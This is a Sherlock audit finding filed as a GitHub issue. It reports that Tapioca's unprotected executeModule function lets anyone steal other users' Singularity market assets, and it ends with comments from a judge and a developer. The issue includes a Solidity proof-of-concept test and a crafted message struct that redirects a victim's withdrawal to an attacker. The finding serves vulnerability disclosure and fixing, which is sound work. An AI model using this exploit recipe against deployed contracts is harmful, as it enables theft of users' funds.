sherlock-audit / 2024-02-tapioca-judging

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ComposableSecurity - Unprotected `executeModule` function allows to steal the tokens #134

Open sherlock-admin2 opened 4 months ago

sherlock-admin2 commented 4 months ago



Unprotected executeModule function allows to steal the tokens


The executeModule function allows anyone to execute any module with any params. That allows attacker to execute operations on behalf of other users.

Vulnerability Detail

Here is the executeModule function:

All its parameters are controlled by the caller and anyone can be the caller. Anyone can execute any module on behalf of any user.

Let's try to steal someone's tokens using UsdoMarketReceiver module and removeAssetReceiver function (below is the PoC).

Here is the code that will call the executeModule function:


The important value here is the marketMsg_ parameter. The removeAssetReceiver function forwards the call to exitPositionAndRemoveCollateral function via magnetar contract.

The exitPositionAndRemoveCollateral function removes asset from Singularity market if the data.removeAndRepayData.removeAssetFromSGL is true. The amount is taken from data.removeAndRepayData.removeAmount. Then, if data.removeAndRepayData.assetWithdrawData.withdraw is true, the _withdrawToChain is called.

In _withdrawToChain, if the data.lzSendParams.sendParam.dstEid is zero, the _withdrawHere is called that transfers asset to

Summing up, the following marketMsg_ struct can be used to steal userB's assets from singularity market by userA.

    user: address(userB),//victim
    externalData: ICommonExternalContracts({
        magnetar: address(magnetar),
        singularity: address(singularity),
        bigBang: address(0),
        marketHelper: address(marketHelper)
    removeAndRepayData: IRemoveAndRepay({
        removeAssetFromSGL: true,//remove from Singularity market
        removeAmount: tokenAmountSD,//amount to remove
        repayAssetOnBB: false,
        repayAmount: 0,
        removeCollateralFromBB: false,
        collateralAmount: 0,
        exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),
        unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),
        assetWithdrawData: MagnetarWithdrawData({
            withdraw: true,//withdraw assets
            yieldBox: address(yieldBox), //where from to withdraw
            assetId: bUsdoYieldBoxId, //what asset to withdraw
            unwrap: false,
            lzSendParams: LZSendParam({
                refundAddress: address(userB),
                fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),
                extraOptions: "0x",
                sendParam: SendParam({
                    amountLD: 0,
                    composeMsg: "0x",
                    dstEid: 0,
                    extraOptions: "0x",
                    minAmountLD: 0,
                    oftCmd: "0x",
                    to: OFTMsgCodec.addressToBytes32(address(userA)) // recipient of the assets
            sendGas: 0,
            composeGas: 0,
            sendVal: 0,
            composeVal: 0,
            composeMsg: "0x",
            composeMsgType: 0
        collateralWithdrawData: MagnetarWithdrawData({
            withdraw: false,
            yieldBox: address(0),
            assetId: 0,
            unwrap: false,
            lzSendParams: LZSendParam({
                refundAddress: address(userB),
                fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),
                extraOptions: "0x",
                sendParam: SendParam({
                    amountLD: 0,
                    composeMsg: "0x",
                    dstEid: 0,
                    extraOptions: "0x",
                    minAmountLD: 0,
                    oftCmd: "0x",
                    to: OFTMsgCodec.addressToBytes32(address(userB))
            sendGas: 0,
            composeGas: 0,
            sendVal: 0,
            composeVal: 0,
            composeMsg: "0x",
            composeMsgType: 0

Here is the modified version of the test_market_remove_asset test that achieves the same result, but with unauthorized call to executeModule function. The userA is the attacker, and userB is the victim.

    function test_malicious_market_remove_asset() public {
        uint256 erc20Amount_ = 1 ether;

        // setup
            deal(address(bUsdo), address(userB), erc20Amount_);

            bUsdo.approve(address(yieldBox), type(uint256).max);
            yieldBox.depositAsset(bUsdoYieldBoxId, address(userB), address(userB), erc20Amount_, 0);

            uint256 sh = yieldBox.toShare(bUsdoYieldBoxId, erc20Amount_, false);
            yieldBox.setApprovalForAll(address(pearlmit), true);
                address(yieldBox), bUsdoYieldBoxId, address(singularity), uint200(sh), uint48(block.timestamp + 1)
            singularity.addAsset(address(userB), address(userB), false, sh);

        uint256 tokenAmount_ = 0.5 ether;

         * Actions
        uint256 tokenAmountSD = usdoHelper.toSD(tokenAmount_, aUsdo.decimalConversionRate());

        //approve magnetar
        bUsdo.approve(address(magnetar), type(uint256).max);
        singularity.approve(address(magnetar), type(uint256).max);

        MarketRemoveAssetMsg memory marketMsg = MarketRemoveAssetMsg({
            user: address(userB),
            externalData: ICommonExternalContracts({
                magnetar: address(magnetar),
                singularity: address(singularity),
                bigBang: address(0),
                marketHelper: address(marketHelper)
            removeAndRepayData: IRemoveAndRepay({
                removeAssetFromSGL: true,
                removeAmount: tokenAmountSD,
                repayAssetOnBB: false,
                repayAmount: 0,
                removeCollateralFromBB: false,
                collateralAmount: 0,
                exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),
                unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),
                assetWithdrawData: MagnetarWithdrawData({
                    withdraw: true,
                    yieldBox: address(yieldBox),
                    assetId: bUsdoYieldBoxId,
                    unwrap: false,
                    lzSendParams: LZSendParam({
                        refundAddress: address(userB),
                        fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),
                        extraOptions: "0x",
                        sendParam: SendParam({
                            amountLD: 0,
                            composeMsg: "0x",
                            dstEid: 0,
                            extraOptions: "0x",
                            minAmountLD: 0,
                            oftCmd: "0x",
                            to: OFTMsgCodec.addressToBytes32(address(userA)) // transfer to attacker
                    sendGas: 0,
                    composeGas: 0,
                    sendVal: 0,
                    composeVal: 0,
                    composeMsg: "0x",
                    composeMsgType: 0
                collateralWithdrawData: MagnetarWithdrawData({
                    withdraw: false,
                    yieldBox: address(0),
                    assetId: 0,
                    unwrap: false,
                    lzSendParams: LZSendParam({
                        refundAddress: address(userB),
                        fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),
                        extraOptions: "0x",
                        sendParam: SendParam({
                            amountLD: 0,
                            composeMsg: "0x",
                            dstEid: 0,
                            extraOptions: "0x",
                            minAmountLD: 0,
                            oftCmd: "0x",
                            to: OFTMsgCodec.addressToBytes32(address(userB))
                    sendGas: 0,
                    composeGas: 0,
                    sendVal: 0,
                    composeVal: 0,
                    composeMsg: "0x",
                    composeMsgType: 0
        bytes memory marketMsg_ = usdoHelper.buildMarketRemoveAssetMsg(marketMsg);

        // I added _checkSender in MagnetarMock (function exitPositionAndRemoveCollateral) so need to whitelist USDO
        cluster.updateContract(aEid, address(bUsdo), true);

        // ----- ADDED THIS ------>
        // Attack using executeModule
        // ------------------------
        // ------------------------

        // Check execution
            assertEq(bUsdo.balanceOf(address(userB)), 0);
                yieldBox.toAmount(bUsdoYieldBoxId, yieldBox.balanceOf(address(userB), bUsdoYieldBoxId), false),
            assertEq(bUsdo.balanceOf(address(userA)), tokenAmount_);

Note: The burst function was modified in the MagnetarMock contract and add call to _checkSender function to reproduce the real situation.

That is also why the bUsdo has been whitelisted in the test.


HIGH - Anyone can steal others' tokens from their markets.

Code Snippet

Tool used

Manual Review


The executeModule function should inspect and validate the _data parameter to make sure that the caller is the same address as the user who executes the operations.

sherlock-admin2 commented 4 months ago

1 comment(s) were left on this issue during the judging contest.

takarez commented:

seem valid; high(2)

cryptotechmaker commented 3 months ago

These are the PRs I did for 19, which might solve it as well

